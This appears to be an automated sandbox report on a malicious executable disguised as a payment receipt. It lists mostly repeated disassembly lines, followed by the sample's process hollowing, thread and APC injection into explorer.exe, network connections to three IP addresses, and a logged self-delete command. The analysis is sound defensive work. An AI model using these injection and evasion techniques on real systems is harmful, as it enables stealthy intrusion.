          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01488CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01436CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_014714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01474496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E3F33 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471751 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01488F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E4710 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0148070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0144FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_014717D2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01437794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0147AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013D5600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01471608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0146FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0146FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01488ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0144FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_014346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0372F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03743B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03743B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0371DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0371F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0371DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037C23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037C23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037C23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037453C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03744BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03742397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0374B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0373EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03721B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03721B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0374138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0375927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_037E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03755A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_03755A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.230 80
Source: C:\Windows\explorer.exe | Network Connect: 162.0.236.49 80
Source: C:\Windows\explorer.exe | Network Connect: 27.123.27.33 80
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Memory written: C:\Users\user\Desktop\Final-Payment-Receipt.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wlanext.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\wlanext.exe | Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: E10000
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
Source: explorer.exe, 00000002.00000000.242407386.0000000005EA0000.00000004.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp | Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000000.235309423.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.235646997.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000003.00000002.492429748.0000000004C20000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Queries volume information: C:\Users\user\Desktop\Final-Payment-Receipt.exe VolumeInformation
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
